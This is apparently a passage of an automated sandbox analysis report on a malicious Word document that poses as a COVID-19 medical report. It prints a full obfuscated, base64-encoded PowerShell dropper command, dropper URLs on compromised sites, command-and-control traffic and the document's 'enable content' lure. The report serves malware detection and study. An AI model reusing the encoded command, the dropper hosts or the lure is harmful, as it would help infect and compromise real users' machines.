wBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2324 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1 MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2832 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2112271033.0000000000326000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1f10:$s1: POwersheLL
00000005.00000002.2112362242.0000000001B54000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1f30:$s1: POwersheLL

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://hotelshivansh.com/UserFiles/8/Avira URL Cloud: Label: malware
Source: http://ownitconsignment.com/files/b/Avira URL Cloud: Label: malware
Source: https://b2bcom.com.br/site/0H/Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: GT-9333 Medical report COVID-19.docReversingLabs: Detection: 25%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F93E4 CryptDecodeObjectEx,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA461 FindFirstFileW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global trafficDNS query: name: www.isatechnology.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 35.208.182.43:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 35.208.182.43:443

Networking:

barindex
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in memory: https://physio-svdh.ch/wp-admin/kK/
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.116.111.59:8080
Source: global trafficHTTP traffic detected: GET /index_htm_files/Kxh/ HTTP/1.1Host: arquivopop.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/OVl/ HTTP/1.1Host: transfersuvan.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 186.64.117.145 186.64.117.145
Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox ViewASN Name: TTNETTR TTNETTR
Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: global trafficHTTP traffic detected: POST /zikye087/k6io5sui3jj27i90cer/zipbonjrmr/ HTTP/1.1DNT: 0Referer: 50.116.111.59/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/Content-Type: multipart/form-data; boundary=------------qm4wTQVJYgofUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.116.111.59:8080Content-Length: 8420Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 197.87.160.216
Source: unknownTCP traffic detected without corresponding DNS query: 197.87.160.216
Source: unknownTCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknownTCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknownTCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknownTCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknownTCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknownTCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E14E6 InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78474F9B-DE8E-4300-98F0-AE5841A8170E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /index_htm_files/Kxh/ HTTP/1.1Host: arquivopop.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/OVl/ HTTP/1.1Host: transfersuvan.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: www.isatechnology.com
Source: unknownHTTP traffic detected: POST /zikye087/k6io5sui3jj27i90cer/zipbonjrmr/ HTTP/1.1DNT: 0Referer: 50.116.111.59/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/Content-Type: multipart/form-data; boundary=------------qm4wTQVJYgofUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.116.111.59:8080Content-Length: 8420Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2116517300.0000000002F12000.00000004.00000001.sdmpString found in binary or memory: http://arquivopop.com.br
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: http://hotelshivansh.com/UserFiles/8/
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000005.00000002.2113047862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2117091810.0000000002960000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2116801238.00000000031E1000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2113047862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2117091810.0000000002960000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2350370536.0000000002FD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2110407873.0000000000114000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2110407873.0000000000114000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000005.00000002.2116517300.0000000002F12000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/P
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120753014.000000001B5AE000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000005.00000002.2120027489.0000000003C53000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.comp
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 7856
Source: unknownProcess created: Commandline size = 7765
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7765
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hnzj\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004747
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020E800
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00213A9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020ECCD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00211108
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00214572
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002087AA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00211D81
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020E1E9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020AFF9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002045F9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00217FCC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00218225
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020CA31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00212433
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00209E02
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00210609
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00219A13
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00206212
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201013
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020241B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201673
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00216C51
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020AEA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020A8AE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021A0B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002132B2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002114BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00210E90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00219494
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021A29B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002050E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002176E8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020D4F6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002188C2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020EEC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00211AD1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00219CD7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00202CDA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00205EDF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020FD22
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00215D25
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020EB26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00204B26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00204D3C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020F908
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00206509
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021410D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00203F0E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020A711
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00205B1F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020DB62
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00212766
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020196F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201577
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00206F7B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021915E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020B5A9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002093AD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002115AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002121B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020B7BC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020BF80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00210B86
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00204390
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020C19E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00208FE5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002071EC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020F1ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002083F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201BF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020CDF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00202FF8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020C3FE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002143CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020D7D7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002097DE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F0609
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E241B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F9A13
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F32B2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002FA0B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F3A9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F76E8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E50E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED4F6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EECCD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F9CD7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F5D25
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E4D3C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E5B1F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA711
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F2766
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EDB62
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E1577
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F4572
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB5A9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F1D81
